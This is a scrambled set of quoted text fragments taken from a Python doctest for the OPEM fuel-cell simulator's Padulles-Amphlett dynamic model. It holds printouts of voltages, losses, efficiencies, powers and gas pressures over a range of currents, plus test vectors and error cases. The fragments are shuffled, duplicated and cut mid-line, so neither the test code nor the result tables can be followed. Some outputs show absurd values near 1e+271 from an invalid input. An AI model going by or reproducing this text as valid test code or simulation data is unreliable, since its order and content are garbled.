-4.665905173901154e+271 V Loss : 9.331810347802308e+270 V PH2", "W ########### Report is generating ... Done! 
>>> Padulles_Amphlett_Data[\"Status\"] True >>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497", ": 14.814425815913308 W FC Voltage : 3.8985331094508706 V Loss : 0.43396509140262446 V PH2", "1.5710516301767605 W ########### I : 1.0 E : 6.068401658824337 V Eta Activation :", "V PH2 : 0.19700213775342923 atm PH2O : 0.24247563821874998 atm PO2 : 0.19053117457991825 atm", "Eta Concentration : 0.00011729309032954864 V Eta Ohmic : 0.0010546098289093816 V FC Efficiency :", "6.068369344266841 V Eta Activation : 0.4129629601316751 V Eta Concentration : 0.0006162888970501038 V Eta", ">>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False)", "PH2O : 0.24233728945612165 atm PO2 : 0.19046771187433184 atm Power-Thermal : 4.279867176181073 W ###########", "PH2 : 0.19687568431889974 atm PH2O : 0.2423199958607931 atm PO2 : 0.1904597790361335 atm Power-Thermal", "PO2 : 0.1906263686382979 atm Power-Thermal : 2.3185876665375803e+269 W ########### I : 2.0 E", "Efficiency : 0.5316790944492106 FC Power : 7.879484179737301 W FC Voltage : 4.147096936703843 V", "FC Power : 10.12561398467885 W FC Voltage : 4.05024559387154 V Loss : 0.4036265972020676", "0.0005267910327125488 V FC Efficiency : 0.6120471438396443 FC Power : 1.4321903165847678 W FC Voltage", ": 1.2 E : 6.068398582464819 V Eta Activation : 0.35009414904739194 V Eta Concentration", "atm PH2O : 0.24257939979072127 atm PO2 : 0.19057877160910808 atm Power-Thermal : 1.1623111227088154 W", "3.8055158202626993 W ########### I : 2.0 E : 6.0683862744646095 V Eta Activation :", "0.19705833927988675 atm PH2O : 0.24254481260006414 atm PO2 : 0.19056290593271147 atm Power-Thermal : 1.5710516301767605", "0.0003746674093630815 V Eta Ohmic : 0.0033538152156708046 V FC Efficiency : 0.5316790944492106 FC Power", "W ########### I : 1.5 E : 
6.068393967445208 V Eta Activation : 0.3648724409731032", ": 0.27813072895256186 V PH2 : 0.19712859118795872 atm PH2O : 0.24263128057670688 atm PO2 :", "atm PH2O : 0.24242375743276434 atm PO2 : 0.19050737606532336 atm Power-Thermal : 3.1088387177404826 W", "FC Efficiency : 0.49981193710908595 FC Power : 14.814425815913308 W FC Voltage : 3.8985331094508706", "PO2 : 0.19035665213955555 atm Power-Thermal : 7.774225509105296 W ########### I : 3.6 E", "V Eta Activation : 0.3648724409731032 V Eta Concentration : 0.0002949968562774962 V Eta Ohmic", "Loss : 0.324807877394268 V PH2 : 0.19707238966150117 atm PH2O : 0.24256210619539273 atm PO2", "########### I : 3.1 E : 6.068369344266841 V Eta Activation : 0.4129629601316751 V", "atm PH2O : 0.24238917024210727 atm PO2 : 0.19049151038892673 atm Power-Thermal : 3.5712130804699886 W", ": 0.41670093756357396 V PH2 : 0.1967632812659846 atm PH2O : 0.24218164709816473 atm PO2 :", ". . . I : 0.1 E : 6.14455344314445 V Eta Activation :", "PH2 : 0.1969178354637429 atm PH2O : 0.24237187664677873 atm PO2 : 0.19048357755072845 atm Power-Thermal", "Power : 5.954436076965834 W FC Voltage : 4.253168626404167 V Loss : 0.36304537588899266 V", ": 0.18576727978992955 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2 :", "FC Voltage : 3.9848661958784737 V Loss : 0.41670093756357396 V PH2 : 0.1967632812659846 atm", ": 3.1 E : 6.068369344266841 V Eta Activation : 0.4129629601316751 V Eta Concentration", "W ########### I : 2.9 E : 6.068372423061707 V Eta Activation : 0.4085437792118771", "-1.2042213141380103e+271 FC Power : -3.757170500110593e+272 W FC Voltage : -9.392926250276482e+271 V Loss :", "Padulles_Amphlett_Data[\"I\"][5] 0.6 >>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5]", ": 2.4 E : 6.068380118926627 V Eta Activation : 0.3960054536369255 V Eta Concentration", 
"Loss : 0.3464843028619262 V PH2 : 0.197030238516658 atm PH2O : 0.24251022540940706 atm PO2", "PH2 : 0.1970161881350436 atm PH2O : 0.24249293181407852 atm PO2 : 0.19053910741811658 atm Power-Thermal", ": 0.4228725100457559 V Eta Concentration : 0.0007181421727400468 V Eta Ohmic : 0.006390481776561363 V", "atm PH2O : 0.24245834462342142 atm PO2 : 0.19052324174171997 atm Power-Thermal : 2.6555639230341663 W", "0.19047564471253012 atm Power-Thermal : 4.041762851824391 W ########### I : 2.1 E : 6.068384735676256", ": 0.005852080755831333 V FC Efficiency : 0.5064475653403494 FC Power : 13.035960331860592 W FC", "atm PO2 : 0.19054704025631486 atm Power-Thermal : 1.9954235329963377 W ########### I : 1.2", "FC Efficiency : 0.5250728373249665 FC Power : 9.010249888496427 W FC Voltage : 4.095568131134739", "0.5139579100323552 W FC Voltage : 5.1395791003235525 V Loss : 0.18576727978992955 V PH2 :", ": 1.9954235329963377 W ########### I : 1.2 E : 6.068398582464819 V Eta Activation", ": 0.00021575349319660598 V Eta Ohmic : 0.0019366035503462617 V FC Efficiency : 0.55589469312397 FC", "Warning : The value of I(>0.1) leads to minus amount of V, please", "PO2 : 0.1905708387709098 atm Power-Thermal : 1.3645077216348895 W ########### I : 0.9 E", "atm Power-Thermal : 1.9954235329963377 W ########### I : 1.2 E : 6.068398582464819 V", "FC Voltage : 4.05024559387154 V Loss : 0.4036265972020676 V PH2 : 0.19683353317405658 atm", "0.0007026162388380664 V FC Efficiency : 0.5997124668722417 FC Power : 1.8711028966413943 W FC Voltage", "0.19056290593271147 atm Power-Thermal : 1.5710516301767605 W ########### I : 1.0 E : 6.068401658824337", "4.519750111503576 W ########### I : 2.3 E : 6.068381657907269 V Eta Activation :", "Voltage : 3.9287927116842014 V Loss : 0.42791409484462756 V PH2 : 0.1966930293579127 atm PH2O", "Loss : 0.37228332551300575 V PH2 : 0.19695998660858605 atm PH2O : 0.24242375743276434 atm PO2", ": 0.0017599744011013664 V FC Efficiency : 0.5600666527156857 FC Power : 
4.368519891182348 W FC", ": 0.24200871114487932 atm PO2 : 0.19031698794856405 atm Power-Thermal : 3.757170500110593e+272 W ########### Report", "W FC Voltage : 4.022761331205627 V Loss : 0.40912283407888206 V PH2 : 0.19680543241082776", "FC Voltage : 4.022761331205627 V Loss : 0.40912283407888206 V PH2 : 0.19680543241082776 atm", "Eta Ohmic : 0.0010546098289093816 V FC Efficiency : 0.5822525519832258 FC Power : 2.724941943281497", ": 0.1010420899676448 W ########### I : 0.2 E : 6.068413961701556 V Eta Activation", "0.000555512176140013 V Eta Ohmic : 0.004957160562216277 V FC Efficiency : 0.5140663396997094 FC Power", ": 0.1906184358000996 atm Power-Thermal : 0.24816738054412169 W ########### I : 0.3 E :", "V Eta Activation : 0.42100548618901656 V Eta Concentration : 0.0006977152837847073 V Eta Ohmic", "0.5293741761651032 FC Power : 8.25823714817561 W FC Voltage : 4.129118574087805 V Loss :", "V Eta Concentration : 0.0006773165893020328 V Eta Ohmic : 0.0060314264601405215 V FC Efficiency", "-*- coding: utf-8 -*- ''' >>> from opem.Dynamic.Padulles_Amphlett import * >>> import shutil", "3.950291009654725 V Loss : 0.42361505111213504 V PH2 : 0.19672113012114145 atm PH2O : 0.2421297663121791", ": 3.7 E : 6.068360106342617 V Eta Activation : 0.4246884348310017 V Eta Concentration", "2.30145399353242 W FC Voltage : 4.60290798706484 V Loss : 0.2931002723075654 V PH2 :", "FC Voltage : 3.8985331094508706 V Loss : 0.43396509140262446 V PH2 : 0.19665087821306954 atm", "Loss : 0.4257931434330969 V PH2 : 0.19670707973952706 atm PH2O : 0.24211247271685057 atm PO2", "0.4129629601316751 V Eta Concentration : 0.0006162888970501038 V Eta Ohmic : 0.0054937518419525275 V FC", "9.76794818682758e-05 V Eta Ohmic : 0.0008785557847524419 V FC Efficiency : 0.5901164085980564 FC Power", "V Eta Concentration : 0.0002553220624997795 V Eta Ohmic : 0.0022902088041253615 V FC Efficiency", "9.010249888496427 W FC Voltage : 4.095568131134739 V Loss : 0.39456301313781456 V PH2 :", "Loss : 
0.41173130254104057 V PH2 : 0.1967913820292134 atm PH2O : 0.2422162342888218 atm PO2", ": 3.5 E : 6.068363185907339 V Eta Activation : 0.42100548618901656 V Eta Concentration", "0.6293798842665886 FC Power : 0.9818326194558784 W FC Voltage : 4.909163097279392 V Loss :", "0.24266586776736396 atm PO2 : 0.1906184358000996 atm Power-Thermal : 0.24816738054412169 W ########### I :", "W FC Voltage : 4.335978606366966 V Loss : 0.3464843028619262 V PH2 : 0.197030238516658", ": 2.301179808139826e-06 V Eta Ohmic : 9.331810347802308e+270 V FC Efficiency : -5.981929710129684e+270 FC", "Power-Thermal : 6.24342366379814 W ########### I : 3.0 E : 6.0683708836963435 V Eta", "2.4 E : 6.068380118926627 V Eta Activation : 0.3960054536369255 V Eta Concentration :", ": 0.3764959824754877 V PH2 : 0.19694593622697168 atm PH2O : 0.2424064638374358 atm PO2 :", "4.60290798706484 V Loss : 0.2931002723075654 V PH2 : 0.19711454080634436 atm PH2O : 0.24261398698137834", ": 0.19053910741811658 atm Power-Thermal : 2.212579832246212 W ########### I : 1.3 E :", "0.27735002084480426 V Eta Concentration : 7.809186891953766e-05 V Eta Ohmic : 0.0007026162388380664 V FC", "########### I : 3.3 E : 6.0683662652154 V Eta Activation : 0.417106024344736 V", "0.004243378155424144 V FC Efficiency : 0.5211232875604884 FC Power : 9.755427943132343 W FC Voltage", ": 0.27735002084480426 V Eta Concentration : 7.809186891953766e-05 V Eta Ohmic : 0.0007026162388380664 V", "V Eta Activation : 0.4246884348310017 V Eta Concentration : 0.0007385973342150736 V Eta Ohmic", ": 0.9106431331307118 V Eta Concentration : 4.6654999364844955e-06 V Eta Ohmic : 1.8785852500552963e+271 V", "V FC Efficiency : -5.981929710129684e+270 FC Power : -9.331810347802308e+271 W FC Voltage :", "0.19043598052153862 atm Power-Thermal : 5.249386015321152 W ########### I : 2.6 E : 6.068377040773017", "PO2 : 0.1905549730945132 atm Power-Thermal : 1.781480108817652 W ########### I : 1.1 E", "W FC Voltage : 4.111968011342347 V Loss : 
0.3912833448667819 V PH2 : 0.19688973470051413", "E : 6.068381657907269 V Eta Activation : 0.39318591119501267 V Eta Concentration : 0.00045476978327314626", "V Eta Ohmic : 0.003531492225469087 V FC Efficiency : 0.5293741761651032 FC Power :", ": 0.00045476978327314626 V Eta Ohmic : 0.004065229504538212 V FC Efficiency : 0.5230579622427114 FC", "Voltage : 4.368519891182348 V Loss : 0.3399763535283976 V PH2 : 0.19704428889827239 atm PH2O", "atm PH2O : 0.24249293181407852 atm PO2 : 0.19053910741811658 atm Power-Thermal : 2.212579832246212 W", "Efficiency : 0.50107358791043 FC Power : 14.460983747095012 W FC Voltage : 3.9083739857013544 V", "0.1904042491687454 atm Power-Thermal : 6.24342366379814 W ########### I : 3.0 E : 6.0683708836963435", "W FC Voltage : 4.206975801412199 V Loss : 0.37228332551300575 V PH2 : 0.19695998660858605", "0.6 E : 6.0684078107750326 V Eta Activation : 0.3041956781419353 V Eta Concentration :", "Loss : 4.63717533307516e+269 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2", ": 0.2423199958607931 atm PO2 : 0.1904597790361335 atm Power-Thermal : 4.519750111503576 W ########### I", "0.0005757433248249061 V Eta Ohmic : 0.005135904406545483 V FC Efficiency : 0.5124481138904448 FC Power", "Power : 9.383659842634243 W FC Voltage : 4.079852105493149 V Loss : 0.397705910482824 V", ": 0.24247563821874998 atm PO2 : 0.19053117457991825 atm Power-Thermal : 2.432697510654893 W ########### I", "1.4321903165847678 W FC Voltage : 4.7739677219492265 V Loss : 0.25888894042333943 V PH2 :", "W FC Voltage : 3.9848661958784737 V Loss : 0.41670093756357396 V PH2 : 0.1967632812659846", "0.38425817529700723 V PH2 : 0.1969178354637429 atm PH2O : 0.24237187664677873 atm PO2 : 0.19048357755072845", "Loss : 0.40072369519096346 V PH2 : 0.19684758355567097 atm PH2O : 0.242285408670136 atm PO2", "0.19708644004311557 atm PH2O : 0.24257939979072127 atm PO2 : 0.19057877160910808 atm Power-Thermal : 1.1623111227088154", ": 0.190420114845142 atm Power-Thermal : 
5.7435444057448075 W ########### I : 2.8 E :", "V Eta Concentration : 0.00013693276339445145 V Eta Ohmic : 0.0012307785370829418 V FC Efficiency", ": 13.393956628655083 W FC Voltage : 3.9393990084279658 V Loss : 0.4257931434330969 V PH2", "9.383659842634243 W FC Voltage : 4.079852105493149 V Loss : 0.397705910482824 V PH2 :", "3.9730043399134525 V Loss : 0.4190730008706778 V PH2 : 0.19674923088437024 atm PH2O : 0.2421643535028362", "V Eta Ohmic : 0.00442164533169592 V FC Efficiency : 0.5192622556245563 FC Power :", ": 1.8785852500552963e+271 V FC Efficiency : -1.2042213141380103e+271 FC Power : -3.757170500110593e+272 W FC", "atm PH2O : 0.24247563821874998 atm PO2 : 0.19053117457991825 atm Power-Thermal : 2.432697510654893 W", "Voltage : 4.165992733072229 V Loss : 0.380479323755368 V PH2 : 0.19693188584535729 atm PH2O", ": 0.0008785557847524419 V FC Efficiency : 0.5901164085980564 FC Power : 2.30145399353242 W FC", "V Loss : 0.3328032238653337 V PH2 : 0.19705833927988675 atm PH2O : 0.24254481260006414 atm", "PH2 : 0.1966789789762983 atm PH2O : 0.2420778855261935 atm PO2 : 0.19034871930135727 atm Power-Thermal", "V Eta Ohmic : 0.004600031286563196 V FC Efficiency : 0.5174690806642298 FC Power :", ": 0.3328032238653337 V PH2 : 0.19705833927988675 atm PH2O : 0.24254481260006414 atm PO2 :", "PH2 : 0.19708644004311557 atm PH2O : 0.24257939979072127 atm PO2 : 0.19057877160910808 atm Power-Thermal", "Concentration : 0.00013693276339445145 V Eta Ohmic : 0.0012307785370829418 V FC Efficiency : 0.5755840434599239", "V Loss : 0.3912833448667819 V PH2 : 0.19688973470051413 atm PH2O : 0.24233728945612165 atm", "1.781480108817652 W ########### I : 1.1 E : 6.068400120676597 V Eta Activation :", "0.3678117158535559 V PH2 : 0.19697403699020044 atm PH2O : 0.24244105102809288 atm PO2 : 0.19051530890352164", "Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5] 0.6 >>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>> 
Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5]", ">>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None) >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"}", "0.6120471438396443 FC Power : 1.4321903165847678 W FC Voltage : 4.7739677219492265 V Loss :", ": 0.24251022540940706 atm PO2 : 0.19054704025631486 atm Power-Thermal : 1.9954235329963377 W ########### I", "Concentration : 0.0006773165893020328 V Eta Ohmic : 0.0060314264601405215 V FC Efficiency : 0.5050511549266622", "Loss : 0.3678117158535559 V PH2 : 0.19697403699020044 atm PH2O : 0.24244105102809288 atm PO2", ": 0.5485505413555333 FC Power : 5.562302489345107 W FC Voltage : 4.27869422257316 V Loss", "Voltage : 4.0097174496577335 V Loss : 0.41173130254104057 V PH2 : 0.1967913820292134 atm PH2O", ": 0.004600031286563196 V FC Efficiency : 0.5174690806642298 FC Power : 10.494272955870581 W FC", ": 0.2583036192079603 V Eta Concentration : 5.853018266659147e-05 V Eta Ohmic : 0.0005267910327125488 V", "FC Efficiency : 0.5271753860695316 FC Power : 8.635132823818928 W FC Voltage : 4.111968011342347", "4.63717533307516e+269 V FC Efficiency : -2.9725482904327946e+269 FC Power : -2.3185876665375803e+269 W FC Voltage", "Eta Concentration : 0.0005151327744999589 V Eta Ohmic : 0.004600031286563196 V FC Efficiency :", "Power-Thermal : 0.7735460064675803 W ########### I : 0.6 E : 6.0684078107750326 V Eta", ": 0.5064475653403494 FC Power : 13.035960331860592 W FC Voltage : 3.950291009654725 V Loss", "Concentration : 0.00023552453535116493 V Eta Ohmic : 0.002113348284589288 V FC Efficiency : 0.5520748042471996", ": 0.5036913732928463 FC Power : 13.750774490894704 W FC 
Voltage : 3.9287927116842014 V Loss", ": 0.197030238516658 atm PH2O : 0.24251022540940706 atm PO2 : 0.19054704025631486 atm Power-Thermal :", "4.7739677219492265 V Loss : 0.25888894042333943 V PH2 : 0.19714264156957312 atm PH2O : 0.24264857417203542", "0.0010546098289093816 V FC Efficiency : 0.5822525519832258 FC Power : 2.724941943281497 W FC Voltage", "0.4319972241282524 V PH2 : 0.1966649285946839 atm PH2O : 0.24206059193086493 atm PO2 : 0.19034078646315894", ">>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>>", "Voltage : 4.404387077581378 V Loss : 0.3328032238653337 V PH2 : 0.19705833927988675 atm PH2O", "0.39870996749954657 V Eta Concentration : 0.000494984370825149 V Eta Ohmic : 0.00442164533169592 V FC", "0.0001960088652678871 V Eta Ohmic : 0.0017599744011013664 V FC Efficiency : 0.5600666527156857 FC Power", "Voltage : 3.9848661958784737 V Loss : 0.41670093756357396 V PH2 : 0.1967632812659846 atm PH2O", "V Loss : 0.3464843028619262 V PH2 : 0.197030238516658 atm PH2O : 0.24251022540940706 atm", ": 2.7 E : 6.068375501600038 V Eta Activation : 0.4038089891176398 V Eta Concentration", ": 3.9614863490169867 V Loss : 0.4213762911512418 V PH2 : 0.19673518050275585 atm PH2O :", "atm PO2 : 0.1905708387709098 atm Power-Thermal : 1.3645077216348895 W ########### I : 0.9", "Concentration : 0.00027514614569545357 V Eta Ohmic : 0.0024671853140681515 V FC Efficiency : 0.5452780290261753", "Power-Thermal : 0.1010420899676448 W ########### I : 0.2 E : 6.068413961701556 V Eta", "Efficiency : -1.2042213141380103e+271 FC Power : -3.757170500110593e+272 W FC Voltage : -9.392926250276482e+271 V", "PO2 : 0.19032492078676233 atm Power-Thermal : 8.818208962422144 W ########### Report is generating ...", "0.24226811507480747 atm PO2 : 0.19043598052153862 atm Power-Thermal : 5.249386015321152 W 
########### I :", ": 6.068380118926627 V Eta Activation : 0.3960054536369255 V Eta Concentration : 0.00047486339861378836 V", "0.19045184619793523 atm Power-Thermal : 4.761340157365757 W ########### I : 2.4 E : 6.068380118926627", "Eta Activation : 0.2583036192079603 V Eta Concentration : 5.853018266659147e-05 V Eta Ohmic :", ": 0.6120471438396443 FC Power : 1.4321903165847678 W FC Voltage : 4.7739677219492265 V Loss", "Power-Thermal : 2.6555639230341663 W ########### I : 1.5 E : 6.068393967445208 V Eta", "6.068403196908046 V Eta Activation : 0.3310434726426763 V Eta Concentration : 0.0001762905810800498 V Eta", ": 3.9848661958784737 V Loss : 0.41670093756357396 V PH2 : 0.1967632812659846 atm PH2O :", ": 0.19704428889827239 atm PH2O : 0.2425275190047356 atm PO2 : 0.1905549730945132 atm Power-Thermal :", "V Eta Ohmic : 0.005314768076451755 V FC Efficiency : 0.5108802815228812 FC Power :", "Voltage : 4.677757241603485 V Loss : 0.27813072895256186 V PH2 : 0.19712859118795872 atm PH2O", "1.3645077216348895 W ########### I : 0.9 E : 6.068403196908046 V Eta Activation :", "atm Power-Thermal : 4.279867176181073 W ########### I : 2.2 E : 6.068383196823811 V", "Power-Thermal : 3.5712130804699886 W ########### I : 1.9 E : 6.068387813188879 V Eta", ": 0.19035665213955555 atm Power-Thermal : 7.774225509105296 W ########### I : 3.6 E :", ": 0.0029988129062160497 V FC Efficiency : 0.5366552535984287 FC Power : 7.116048662715165 W FC", ": 6.068377040773017 V Eta Activation : 0.40130847825734167 V Eta Concentration : 0.0005151327744999589 V", "FC Power : 0.5139579100323552 W FC Voltage : 5.1395791003235525 V Loss : 0.18576727978992955", "0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031", ": 4.7739677219492265 V Loss : 0.25888894042333943 V PH2 : 0.19714264156957312 atm PH2O :", 
"########### I : 2.9 E : 6.068372423061707 V Eta Activation : 0.4085437792118771 V", ": 0.4264559863331208 V Eta Concentration : 0.0007590808465813247 V Eta Ohmic : 0.006750024222922298 V", "Power-Thermal : 2.3185876665375803e+269 W ########### I : 2.0 E : 6.144553272737403 V Eta", ": 0.1966930293579127 atm PH2O : 0.24209517912152204 atm PO2 : 0.19035665213955555 atm Power-Thermal :", "V FC Efficiency : 0.49981193710908595 FC Power : 14.814425815913308 W FC Voltage :", "0.1966789789762983 atm PH2O : 0.2420778855261935 atm PO2 : 0.19034871930135727 atm Power-Thermal : 8.033558485745605", "FC Efficiency : 0.5755840434599239 FC Power : 3.1426888772911847 W FC Voltage : 4.489555538987407", "V FC Efficiency : 0.5050511549266622 FC Power : 13.393956628655083 W FC Voltage :", "Eta Ohmic : 9.331810347802308e+270 V FC Efficiency : -5.981929710129684e+270 FC Power : -9.331810347802308e+271", ": 0.30536758106117423 V PH2 : 0.19710049042472996 atm PH2O : 0.2425966933860498 atm PO2 :", "FC Efficiency : 0.55589469312397 FC Power : 4.769576467003663 W FC Voltage : 4.335978606366966", ": 0.0002553220624997795 V Eta Ohmic : 0.0022902088041253615 V FC Efficiency : 0.5485505413555333 FC", "PH2 : 0.19705833927988675 atm PH2O : 0.24254481260006414 atm PO2 : 0.19056290593271147 atm Power-Thermal", ": 0.1 E : 6.0684154992732005 V Eta Activation : 0.18557231242539243 V Eta Concentration", "0.00047486339861378836 V Eta Ohmic : 0.004243378155424144 V FC Efficiency : 0.5211232875604884 FC Power", "PH2O : 0.24206059193086493 atm PO2 : 0.19034078646315894 atm Power-Thermal : 8.29401625290499 W ###########", "Eta Activation : 0.27735002084480426 V Eta Concentration : 7.809186891953766e-05 V Eta Ohmic :", "0.0054937518419525275 V FC Efficiency : 0.5093595307581349 FC Power : 12.316313453731704 W FC Voltage", "0.0028214871486926026 V FC Efficiency : 0.5393558719759229 FC Power : 6.731161282259518 W FC Voltage", "atm PH2O : 0.24202600474020786 atm PO2 : 0.19032492078676233 atm Power-Thermal : 
8.818208962422144 W", "Eta Concentration : 0.0004347034505143372 V Eta Ohmic : 0.0038871991293599716 V FC Efficiency :", ": 4.129118574087805 V Loss : 0.387853540075361 V PH2 : 0.19690378508212852 atm PH2O :", "FC Voltage : 4.111968011342347 V Loss : 0.3912833448667819 V PH2 : 0.19688973470051413 atm", ": 0.19049944322712503 atm Power-Thermal : 3.338951337284836 W ########### I : 1.8 E :", "0.3648724409731032 V Eta Concentration : 0.0002949968562774962 V Eta Ohmic : 0.002644278024175193 V FC", "FC Efficiency : -2.9725482904327946e+269 FC Power : -2.3185876665375803e+269 W FC Voltage : -2.3185876665375803e+270", "Loss : 0.42791409484462756 V PH2 : 0.1966930293579127 atm PH2O : 0.24209517912152204 atm PO2", "atm Power-Thermal : 1.1623111227088154 W ########### I : 0.8 E : 6.068404734927729 V", "0.0038871991293599716 V FC Efficiency : 0.5250728373249665 FC Power : 9.010249888496427 W FC Voltage", "0.9818326194558784 W FC Voltage : 4.909163097279392 V Loss : 0.23185017288443285 V PH2 :", "atm PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 9.331810347802308e+271 W", "PH2O : 0.24223352788415034 atm PO2 : 0.190420114845142 atm Power-Thermal : 5.7435444057448075 W ###########", "0.005672855976278701 V FC Efficiency : 0.507882865258588 FC Power : 12.676756316854359 W FC Voltage", "Concentration : 0.0005960022064159204 V Eta Ohmic : 0.005314768076451755 V FC Efficiency : 0.5108802815228812", "0.1966930293579127 atm PH2O : 0.24209517912152204 atm PO2 : 0.19035665213955555 atm Power-Thermal : 7.774225509105296", "atm PH2O : 0.24209517912152204 atm PO2 : 0.19035665213955555 atm Power-Thermal : 7.774225509105296 W", ": 0.4358872495310143 V PH2 : 0.19663682783145514 atm PH2O : 0.24202600474020786 atm PO2 :", "PH2 : 0.1971566919511875 atm PH2O : 0.24266586776736396 atm PO2 : 0.1906184358000996 atm Power-Thermal", "atm Power-Thermal : 2.6555639230341663 W ########### I : 1.5 E : 6.068393967445208 V", "########### I : 0.3 E : 6.068412424065923 V Eta 
Activation : 0.2583036192079603 V", "0.1969178354637429 atm PH2O : 0.24237187664677873 atm PO2 : 0.19048357755072845 atm Power-Thermal : 3.8055158202626993", "atm PO2 : 0.19046771187433184 atm Power-Thermal : 4.279867176181073 W ########### I : 2.2", "FC Voltage : 4.079852105493149 V Loss : 0.397705910482824 V PH2 : 0.19686163393728537 atm", ": 1.6 E : 6.068392428977227 V Eta Activation : 0.36914696409844006 V Eta Concentration", "0.19674923088437024 atm PH2O : 0.2421643535028362 atm PO2 : 0.1903883834923488 atm Power-Thermal : 6.748686546268298", "atm Power-Thermal : 7.003243683145644 W ########### I : 3.3 E : 6.0683662652154 V", "PH2O : 0.24245834462342142 atm PO2 : 0.19052324174171997 atm Power-Thermal : 2.6555639230341663 W ###########", ": 0.004778536276705824 V FC Efficiency : 0.5157386322058496 FC Power : 10.861455594255196 W FC", ": 0.1906263686382979 atm Power-Thermal : 2.3185876665375803e+269 W ########### I : 2.0 E :", "V FC Efficiency : 0.49857958703411753 FC Power : 15.166791037577857 W FC Voltage :", "Ohmic : 0.006929978850845375 V FC Efficiency : 0.49857958703411753 FC Power : 15.166791037577857 W", "-5.981929710129684e+270 FC Power : -9.331810347802308e+271 W FC Voltage : -4.665905173901154e+271 V Loss :", ": 0.0004347034505143372 V Eta Ohmic : 0.0038871991293599716 V FC Efficiency : 0.5250728373249665 FC", ": 4.769576467003663 W FC Voltage : 4.335978606366966 V Loss : 0.3464843028619262 V PH2", ": 0.19712859118795872 atm PH2O : 0.24263128057670688 atm PO2 : 0.19060257012370302 atm Power-Thermal :", "Concentration : 0.00039465233709598025 V Eta Ohmic : 0.003531492225469087 V FC Efficiency : 0.5293741761651032", "V Loss : 0.38425817529700723 V PH2 : 0.1969178354637429 atm PH2O : 0.24237187664677873 atm", ": 0.2931002723075654 V PH2 : 0.19711454080634436 atm PH2O : 0.24261398698137834 atm PO2 :", "V Loss : 0.41173130254104057 V PH2 : 0.1967913820292134 atm PH2O : 0.2422162342888218 atm", "FC Power : 9.383659842634243 W FC Voltage : 4.079852105493149 V 
Loss : 0.397705910482824", ": 0.0007795927885366656 V Eta Ohmic : 0.006929978850845375 V FC Efficiency : 0.49857958703411753 FC", "* >>> import shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ###########", "atm Power-Thermal : 2.212579832246212 W ########### I : 1.3 E : 6.068397044188998 V", "Concentration : 0.0005151327744999589 V Eta Ohmic : 0.004600031286563196 V FC Efficiency : 0.5174690806642298", "Loss : 0.4036265972020676 V PH2 : 0.19683353317405658 atm PH2O : 0.24226811507480747 atm PO2", "Loss : 0.23185017288443285 V PH2 : 0.1971566919511875 atm PH2O : 0.24266586776736396 atm PO2", ": 0.5230579622427114 FC Power : 9.383659842634243 W FC Voltage : 4.079852105493149 V Loss", "0.19693188584535729 atm PH2O : 0.24238917024210727 atm PO2 : 0.19049151038892673 atm Power-Thermal : 3.5712130804699886", "Ohmic : 0.0003510800160998837 V FC Efficiency : 0.6293798842665886 FC Power : 0.9818326194558784 W", "V PH2 : 0.19663682783145514 atm PH2O : 0.24202600474020786 atm PO2 : 0.19032492078676233 atm", "0.19714264156957312 atm PH2O : 0.24264857417203542 atm PO2 : 0.1906105029619013 atm Power-Thermal : 0.41280968341523216", "E : 6.068380118926627 V Eta Activation : 0.3960054536369255 V Eta Concentration : 0.00047486339861378836", "atm PH2O : 0.2421643535028362 atm PO2 : 0.1903883834923488 atm Power-Thermal : 6.748686546268298 W", "V Eta Ohmic : 0.0008785557847524419 V FC Efficiency : 0.5901164085980564 FC Power :", "N=4) 2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None)", "V PH2 : 0.1969178354637429 atm PH2O : 
